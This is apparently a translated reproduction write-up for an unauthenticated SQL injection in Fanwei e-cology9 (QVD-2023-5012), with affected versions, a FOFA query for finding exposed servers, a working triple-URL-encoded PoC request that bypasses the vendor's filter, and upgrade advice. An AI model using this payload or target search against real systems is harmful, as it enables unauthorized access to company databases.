Fanwei e-cology9 SQL injection vulnerability reappears【QVD-2023-5012】
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
e-cology, a pan-micro collaborative management application platform, is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, and data center functions. A large-scale collaborative management platform for enterprises.
2. Vulnerability overview
There is a SQL injection vulnerability in Fanwei e-cology9. Unauthenticated remote attackers can use this vulnerability to obtain sensitive database information, and further exploitation may lead to the target system being charged.
3. Scope of influence
Affected version
Fanwei e-cology9 <= 10.55
unaffected version
Fanwei e-cology9 >= 10.56
Fourth, reproduce the environment
FOFA: app="Panwei-Collaborative Business System"
5. Vulnerability recurrence
Access the vulnerable environment, burp captures packets and sends the Repeater module for use
PoC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
Note: Three parameters need to be passed in in the POC
1. isDis must be 1
2. browserTypeId corresponds to the method
3. keyword is the injection point, and url encoding must be performed 3 times to escape Panwei’s filtering mechanism (Panwei’s blacklist mechanism will put keywords replaced by double-width characters)
Query database version information
Reproduced successfully
Dragon POC
6. Repair suggestions
At present, the official security patch has been released, and it is recommended that affected users upgrade to version 10.56 and above as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp